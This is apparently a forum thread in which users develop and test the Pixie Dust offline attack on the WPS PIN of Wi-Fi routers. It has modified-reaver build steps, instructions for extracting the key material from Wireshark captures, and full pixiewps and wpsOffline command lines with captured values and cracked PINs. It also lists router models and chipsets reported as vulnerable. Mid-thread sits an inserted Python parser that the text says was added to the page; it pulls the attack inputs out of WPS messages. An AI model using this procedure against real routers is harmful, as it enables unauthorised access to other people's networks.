I believe when the PIN is enabled, the pin on the back is active but when it is disabled, that stated PIN is enabled. Any thoughts on this?
copy.
How do you guys get the keys out of pcap file?
just use wireshark?
No, they actually both work at the same time. It seems to just be a secret pin...
Well everything but the Authkey can be found in wireshark. You can download the modified version of reaver that prints the Authkey, Enrollee Nonce, E-Hash1 and E-Hash2 here. The rest you need to find in a cap file/wireshark. -This was made following wiire's advice from a previous post!
The PKE and PKR (Public Keys) are in the M1 and M2 messages. The M1 contains "Public Key" which is the PKE and the M2 also contains a "Public Key" but this key is different... aka the PKR. (Just right click and copy the values)
If you can give me all this data, that would help A LOT in testing. Print it just like this:
Code:
N1 Enrollee Nonce:
Authkey:
PKE:
PKR:
E-Hash1:
E-Hash2:
And optional (but very helpful) information:
Code:
Manufacturer:
Model Number:
Hardware Version:
All you have to do is:
Code:
cd /path/to/reaver-wps-fork/src
./configure
make
make install
Then you should be good to find data.
Last edited by soxrok2212; 2015-03-31 at 00:48.
Install matters for reaver download
Go to the src folder
To avoid a file permission error type
chmod 755 configure
then
./configure
make
make install
If you get the following error
checking for pcap_open_live in -
lpcap... no
error: pcap library not found!
Then install these two(2) files:
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
then
./configure
make
make install
Program ran fine after this
Great Stuff soxrok2212!!!
Haven't had a chance to test the PIN, but here is what I got.
Code:
Arris - DG1670AB2
N1 Enrollee Nonce: 5b:21:6e:79:7f:3d:76:ff:b0:d7:90:69:33:bc:d3:d7
Authkey: 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c
PKE: d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a
PKR: bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e
E-Hash1: 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38
E-Hash2: b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec
PIN Found- 04847533
To soxrok2212
We see your written reaver program provides the Enrollee nonce
The problem we are having is with the -pke and -pkr keys. When we capture the M1 and M2 message with wireshark the message is too long. Note in the working example published in these threads the length of the -pke string was 384. Our captures are twice that long.
The string length of the -ak -hash1 and -hash2 is 64
A breakdown of M1 and M2 can be found at:
https://briolidz.wordpress.com/2012/...ted-setup-wps/
Enrollee -> Registrar: M1 = Version || N1 || Description || PKE
Enrollee <- Registrar: M2 = Version || N1 || N2 || Description || PKR [ || ConfigData ] || HMAC_AuthKey(M1 || M2*)
• || this symbol means concatenation of parameters to form a message.
• Mn* is message Mn excluding the HMAC-SHA-256 value.
• Version identifies the type of Registration Protocol message.
• N1 is a 128-bit random number (nonce) specified by the Enrollee.
• N2 is a 128-bit random number (nonce) specified by the Registrar.
• Description contains a human-readable description of the sending device (UUID, manufacturer, model number, MAC address, etc.) and device capabilities such as supported algorithms, I/O channels, Registration Protocol role, etc. Description data is also included in 802.11 probe request and probe response messages
Our understanding is we must strip off parts of the M1 and M2 message is this correct?
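The length mismatch asked about above comes from the message layout: a WSC M1 or M2 is a list of type-length-value attributes, and the Public Key (type 0x1032, 192 bytes, i.e. 384 hex characters) is only one of them, sitting next to the nonces, the UUID, the MAC address and the manufacturer/model "Description" fields. The parser below is an added example written for this page, not code from the thread, from reaver or from pixiewps. It walks the TLV list of a constructed (not captured) M1, pulls out the fields the thread asks for, checks their lengths against the sizes quoted in the thread, flags a public key of "...00:02" (the small-DH-key value a later post reports seeing in M2) and matches a session by the enrollee nonce, which is the comparison suggested later in the thread. The attribute type codes are those of the Wi-Fi Simple Configuration specification; all function names and sample values are assumptions for the example.

```python
"""Pull the Pixie Dust inputs out of a WSC (WPS) M1 attribute list.
Added example for this thread; not code from the thread, reaver or pixiewps.
Attribute type codes follow the Wi-Fi Simple Configuration spec; the sample
M1 at the bottom is constructed (assumed values), not a capture."""
import struct

# WSC attributes are TLVs: 2-byte type, 2-byte big-endian length, value.
WSC_ATTR = {
    0x104A: "Version", 0x1022: "Message Type", 0x1047: "UUID-E",
    0x1020: "MAC Address", 0x101A: "Enrollee Nonce", 0x1039: "Registrar Nonce",
    0x1032: "Public Key", 0x1021: "Manufacturer", 0x1024: "Model Number",
    0x1014: "E-Hash1", 0x1015: "E-Hash2", 0x1005: "Authenticator",
}
# Sizes the thread quotes as hex-string lengths: 384 hex chars = 192 bytes
# for PKE/PKR, 64 hex chars = 32 bytes for AuthKey and the E-Hashes.
EXPECTED_LEN = {"Enrollee Nonce": 16, "Registrar Nonce": 16,
                "Public Key": 192, "E-Hash1": 32, "E-Hash2": 32}


def parse_wsc(payload: bytes) -> dict:
    """Walk the TLV list and return {attribute name: raw value bytes}."""
    attrs, off = {}, 0
    while off < len(payload):
        if off + 4 > len(payload):
            raise ValueError("truncated attribute header at offset %d" % off)
        typ, length = struct.unpack(">HH", payload[off:off + 4])
        off += 4
        if off + length > len(payload):
            raise ValueError("attribute 0x%04x runs past end of payload" % typ)
        attrs[WSC_ATTR.get(typ, "0x%04x" % typ)] = payload[off:off + length]
        off += length
    return attrs


def build_attr(typ: int, value: bytes) -> bytes:
    """Encode one TLV (used here only to build the constructed sample)."""
    return struct.pack(">HH", typ, len(value)) + value


def colon_hex(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def from_hex(s: str) -> bytes:
    """Accept both the 'af:75:...' and the 'af75...' spelling of a value."""
    return bytes.fromhex(s.replace(":", "").replace(" ", ""))


def check_field(name: str, value: bytes) -> list:
    """Sanity checks on one extracted field; an empty list means it looks right."""
    problems = []
    want = EXPECTED_LEN.get(name)
    if want is not None and len(value) != want:
        problems.append("%s: expected %d bytes, got %d" % (name, want, len(value)))
    if name == "Public Key" and value:
        # A DH public key equal to 2 (the generator itself) is the small-DH-key
        # case; an all-zero key means no key was generated at all.
        if int.from_bytes(value, "big") == 2:
            problems.append("Public Key is 2: small DH key, not a real exchange")
        elif not any(value):
            problems.append("Public Key is all zeros")
    return problems


def pixie_inputs(payload: bytes) -> dict:
    """M1 fields in the 'N1 Enrollee Nonce: / PKE:' layout requested in the thread."""
    attrs = parse_wsc(payload)
    if attrs.get("Message Type") != b"\x04":   # 0x04 is M1 in the WSC spec
        raise ValueError("not an M1 message")
    return {"N1 Enrollee Nonce": colon_hex(attrs["Enrollee Nonce"]),
            "PKE": colon_hex(attrs["Public Key"]),
            "Manufacturer": attrs.get("Manufacturer", b"").decode("ascii", "replace"),
            "Model Number": attrs.get("Model Number", b"").decode("ascii", "replace")}


def same_session(reaver_nonce: str, attrs: dict) -> bool:
    """Match the N1 reaver printed against the M1 in a capture. Compare the
    nonce rather than PKE/PKR, since some APs reuse their DH key."""
    return from_hex(reaver_nonce) == attrs.get("Enrollee Nonce")


# Constructed sample M1 (assumed values): the Public Key is one attribute among
# several, so a whole M1 copied out of a capture is much longer than PKE alone.
SAMPLE_NONCE = bytes(range(16))
SAMPLE_PKE = bytes((i * 7 + 3) % 256 for i in range(192))
SAMPLE_M1 = (build_attr(0x104A, b"\x10") + build_attr(0x1022, b"\x04")
             + build_attr(0x1047, bytes(16))
             + build_attr(0x1020, bytes.fromhex("001122334455"))
             + build_attr(0x101A, SAMPLE_NONCE) + build_attr(0x1032, SAMPLE_PKE)
             + build_attr(0x1021, b"ExampleVendor") + build_attr(0x1024, b"MODEL-0"))

if __name__ == "__main__":
    for key, val in pixie_inputs(SAMPLE_M1).items():
        print("%s: %s" % (key, val))
    print("whole M1: %d bytes; PKE alone: %d hex chars"
          % (len(SAMPLE_M1), len(colon_hex(SAMPLE_PKE).replace(":", ""))))
```

Feed parse_wsc() the bytes Wireshark shows as the WSC attribute list of the EAP-WSC frame (not the whole 802.11 frame) and pick the "Public Key" entry; for an M2 the same entry is PKR, and the Registrar Nonce appears alongside it.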
This is what I got:
root@Kali:~# pixiewps -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec
[%] Progress: 0% 100%
[*] Time taken: 0 s
[*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[*] PSK1: d4:eb:0c:2a:38:15:e1:a0:3d:70:db:74:31:eb:53:a3
[*] PSK2: d3:b7:e6:23:f3:1d:22:0a:23:ea:07:bb:7f:76:65:8b
[+] WPS pin: 04840753
Last edited by soxrok2212; 2015-03-31 at 03:13.
MTeams are stumbling through this attack, testing on three(3) different computers.
Here is an administrative problem to watch out for.
1. When running the new reaver program provided by soxrok2212 you should see additional text data.
Such as:
Starting Cracking Session....
> N1 Enrollee Nounce: ....
>Auth Key....
If you just see normal reaver output stop reaver and make sure the Network-Manager Icon has both
Enable Networking
Enable Wireless
checked. If that does not work restart the computer.
Some laptops will not provide this output unless these two(2) items are functioning.
Same here Finishing Broadcom PRNG as well
Maybe it is not worth it to implement in several threads; you can bruteforce PSK2 at the same time as PSK1. But being time zero ....
With Broadcom, since we got N1 and the entropy is reduced to 32-7=25 bits. It is still constant time even without threads.
$ time python wpsOffline.py -ak 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -pke d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a -pkr bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e -ehash1 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -ehash2 b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec
PIN FOUND! 04847533
real 0m0.488s
user 0m0.473s
sys 0m0.012s
Last edited by dudux; 2015-03-31 at 11:29.
hey, I'm testing it with a TP-Link device on a WN722N usb dongle (Atheros)
and nothing comes up with the wpsOffline script.
Code:
Atheros Communications, Inc. AR9271 802.11n
can anyone ping me pixiewps.c version?
link on dropbox is dead
p.s.
on some routers PKE comes up as
Code:
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
cheers.
my data is
Code:
> AuthKey: 89:90:f7:93:61:95:eb:3b:36:5e:6e:31:b9:e6:cc:76:e4:20:8b:b9:a6:65:00:de:0a:d4:2e:06:70:64:5c:46
[+] Sending M2 message
> E-Hash1: 9b:21:69:1d:bd:94:16:b5:b6:53:74:76:48:88:69:ed:e4:ae:30:95:82:22:4f:fa:a5:3c:56:19:45:f5:3e:ac
> E-Hash2: 22:ac:97:70:3d:c0:e6:2d:28:d4:9e:61:f7:92:d2:8b:c8:59:6b:8d:14:c9:cb:15:93:76:b7:4b:19:b2:a3:95
M1 PKE - 82:ea:40:37:43:42:0b:a5:56:8e:48:50:c3:d7:ce:8b:9d:79:c8:0e:c8:01:a7:e0:45:e9:53:35:2b:e1:f9:76:e0:bd:bf:4d:9a:32:be:84:86:88:03:ca:55:61:ef:e9:af:a9:f7:99:b2:98:40:a9:cc:37:15:be:79:19:57:69:02:ac:4b:7c:11:ba:e5:3f:b6:e9:89:e9:c0:6d:0e:ac:50:d1:04:d7:f4:35:04:ec:3c:7d:0d:16:e7:c7:1b:e8:0f:37:90:7b:91:f8:3a:64:22:af:4c:9e:3c:ff:68:7c:c1:b1:b1:00:0c:ba:83:5d:18:28:b5:7b:ca:86:00:97:ff:1f:00:6e:0c:eb:6f:c2:62:85:b5:4a:19:28:b3:67:81:4b:bb:22:74:d0:ac:5e:0a:d1:91:66:cd:1b:28:76:8e:57:a1:16:af:2d:a9:ad:a1:f1:d0:fa:c6:91:5d:be:c0:d3:fb:73:d1:9a:37:47:23:64:fc:88:aa:08:01:c9
M2 PKR - 38:e3:db:ae:9c:ce:35:98:7c:f3:c8:61:ab:4d:8d:08:ef:ba:73:73:a3:bf:18:b8:e4:1b:13:62:6e:e9:9a:d8:d6:7b:fc:d0:ed:7b:55:19:2e:ff:43:e1:3b:9e:1e:bd:c8:60:29:6a:03:a1:c9:cf:47:18:0c:d6:f7:3c:32:86:27:a4:1d:77:d7:0d:0d:48:02:1e:15:81:de:0a:2c:71:3f:fa:d1:da:eb:5e:95:e4:3d:b6:a6:39:d5:ab:f8:d3:8d:d5:91:fa:b0:ac:07:51:67:2b:56:f2:39:2f:12:00:f2:42:21:8a:5f:60:1a:98:e4:f7:42:7c:b4:1c:6d:0a:1f:b3:9c:66:bf:8d:8b:27:57:04:f9:e5:c1:b9:38:4f:f6:6d:65:ec:45:dd:23:b7:72:09:91:38:f9:48:59:6e:0c:8c:df:57:10:0a:18:8b:39:d7:bb:bf:19:22:c5:98:cd:a3:28:62:c8:4f:d2:fa:8d:9f:0a:db:57:bb:26:a5
Last edited by wn722; 2015-03-31 at 15:51.
big ups soxrox and musket for explanations.
If wpsOffline does not print anything that means PIN NOT FOUND! The router is not taking ES1=ES2 as zero.
the C code I hosted right here: https://bitbucket.org/dudux/wpsoffli...ode/?at=master
But it will give you the same result. Basically the attack is pretty much the same
That version of pixiewps is deprecated. A new version should be released soon by the author wiire.
ok,
is it AP chipset specific? or firmware?
I haven't been able to test the PIN of my initial capture, but tested this one today and it worked perfectly.
Code:
TG1672G32
N1 Enrollee Nonce: dd:0a:25:21:2c:55:e8:6b:39:67:cf:2f:6d:0b:d9:6e
AuthKey: 54:19:47:34:ef:1a:79:5f:9a:29:2a:c2:fc:17:4a:74:78:bf:47:71:87:1e:30:27:67:3b:ef:32:58:b7:2b:4c
PKE: 7f:43:2b:4d:4b:ab:2e:63:60:a5:10:20:75:da:c8:b9:8b:1e:4c:ff:c3:c3:29:3a:4f:4e:16:53:dc:76:df:de:d8:6c:4e:35:28:82:c0:5c:f8:79:85:51:3c:a1:06:3c:a3:6a:84:b8:43:e1:28:29:9a:0e:98:38:d2:18:0c:e4:69:ff:d4:1e:c7:a2:8e:82:1a:84:16:e7:d4:a1:c2:f6:2d:9d:5d:3d:bf:82:73:be:26:74:14:69:82:f7:d5:ee:aa:32:77:ba:79:b0:55:88:fa:9a:61:f4:f7:5e:4f:d7:da:76:da:60:b4:cd:93:e0:53:dd:62:09:33:c3:56:48:3f:22:68:b2:46:12:a2:ea:a2:75:e2:be:57:9f:86:fb:5b:bf:03:f7:2d:37:d2:10:c8:26:8d:d2:d5:b1:4a:f6:2f:66:bd:25:2d:1f:ae:90:e2:b9:ee:78:da:5b:86:59:bb:57:67:a1:63:5e:c0:66:a3:5c:82:96:62:f7:7b:ed
PKR: 0c:6d:d1:29:13:e7:b6:4c:ef:56:6e:19:4f:4d:e0:b6:5e:0f:8d:08:4d:32:af:bd:7c:75:ae:5b:15:a6:53:d7:4a:27:53:44:54:8f:18:5a:56:67:ff:a5:27:a1:a4:95:31:b5:57:af:d2:53:e2:8d:c4:b5:c2:eb:0f:b7:0c:43:82:10:aa:2f:b4:42:e5:b1:ed:a7:a1:f0:d0:50:1a:e4:69:ca:f7:a9:da:b9:ff:86:6f:68:59:61:e1:37:19:de:50:51:bd:dd:60:ef:85:a8:e2:90:64:03:24:a6:c2:9d:e4:6d:09:92:11:52:30:4c:9e:b4:2e:a8:fe:be:f8:88:7c:f4:ae:eb:57:40:b7:8f:8b:5d:f7:62:5a:bf:80:21:46:e9:83:28:95:f1:58:d9:26:f5:c6:2a:bf:83:ab:a5:eb:ac:ee:e0:96:5e:06:9f:0e:ca:06:32:2a:72:57:95:b6:dd:67:d4:f7:56:98:9b:fa:ba:51:88:e8:a7:08:34
E-Hash1: 36:7c:e3:7e:cc:75:74:f6:88:1a:6b:7d:06:15:ef:d8:2c:eb:d9:d6:07:b8:2d:68:4b:ec:25:8f:3e:14:15:07
E-Hash2: 55:c7:18:2b:c6:ed:87:de:95:d2:98:19:2e:69:f9:0e:65:a9:d0:02:5e:ed:9c:24:d4:ce:2a:63:14:61:46:56
[+] Pin cracked in 15 seconds
[+] WPS PIN: '31335492'
i see.
one more question - these keys (ak, PKE, PKR, Ehash1/2) do they need to be part of the same conversation?
OR any key is good?
They have to be from the same session. Aka pin 77755533's data will differ from 98949682. The data is not interchangeable.
Last edited by soxrok2212; 2015-04-01 at 14:13.
Well you can compare the enrollee nonce that reaver prints with the enrollee nonce in wireshark... then you can assume the rest of the data is matching and you are looking at the right session. Don't compare PKE or PKR values as some APs reuse DH Keys!
nah, i was just being thick - all it takes is to run reaver with one pin attempt.
I'm assuming you get all the data from one try though
Yes you are correct
anyone tried TP-Link devices?
I got some 740,841 and it's zip.
There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?
More reaver/bully reinstall problems with pixiedust mod
Musket Team labs did a fresh HD install of kali-linux then apt-get upgrade/apt-get install then loaded the pixie dust modded bully and reaver. First note our comments in threads above for the reaver install concerning libpcap-dev and libsqlite3-dev.
In addition:
When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.
You will also find that when reinstalling bully that you get an openssl error message and a failed reinstall.
To correct this get an internet connection then:
apt-get install libssl-dev
Run wireshark and reaver and the public key for M2 will be seen.
Install bully and the install process proceeds with no errors.
Musket Teams Labs
Last edited by mmusket33; 2015-04-02 at 02:51.
To wiire - Yes we ran a test and you are correct. This then leads to the obvious question.
1. Will a pixie dust attack work with DH small data?
2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.
MTeams
@wiire
hm, can you look it up?
also did you use wpsOffline or pixiewps script?
I will try to see if small DH Keys work later today. I don't expect it to, however, but it is certainly worth a try.
Pixiewps is out!
Link to the pixiewps thread.
Modified Reaver Not Showing Public Key (pke)..
Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
> N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
[+] Received M1 message
> AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40:27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
[+] Sending M2 message
> E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03:0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
> E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c:00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
> N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
[+] Received M1 message
> AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e:5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
[+] Sending M2 message
> E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a:c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
> E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75:e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 3
cool.
does it matter if you use dec format or just plain string?
af:75:f6:2c:eb:08:c3:f9:71:72:22:92:04:6f:cd:0c
vs
af75f62ceb08c3f971722292046fcd0c
I'm pretty sure both work.
If anyone has luck on devices can you post your HW info?
didn't work for
TP link 841N v8 - AR9341
TP link 841N v9 - QCA9533-AL3A
TP link 720N v1 - AR9331
hey any way to get the AK from wireshark only?
Those are all Atheros, which is not supported; that's why it didn't work.
many ,many thanks for this thread && hard work && scripts guys!!!!! (soxrok2212,wiire,kcdtv,rep.....thanks-so-much.)
really appreciate!!!!
one-test...seem correct
http://www.imagestime.com/show.php/1...pixie.PNG.html
Many thanks soxrok2212 and all who participated! Epic thread
Quick question. Would it matter if I always use the enrollee nonce? or should I only use it in certain cases?
Nah it shouldn't matter... Just be sure to always use it when you attack broadcom.
[P] WPS Manufacturer: ENCORE Technologies, Inc.
[P] WPS Model Number: ENHWI-3GN3
Ralink chipset: RT3050
Confirmed Vulnerable.
https://wikidevi.com/wiki/Encore_ENHWI-3GN3
Last edited by aanarchyy; 2015-04-07 at 18:19.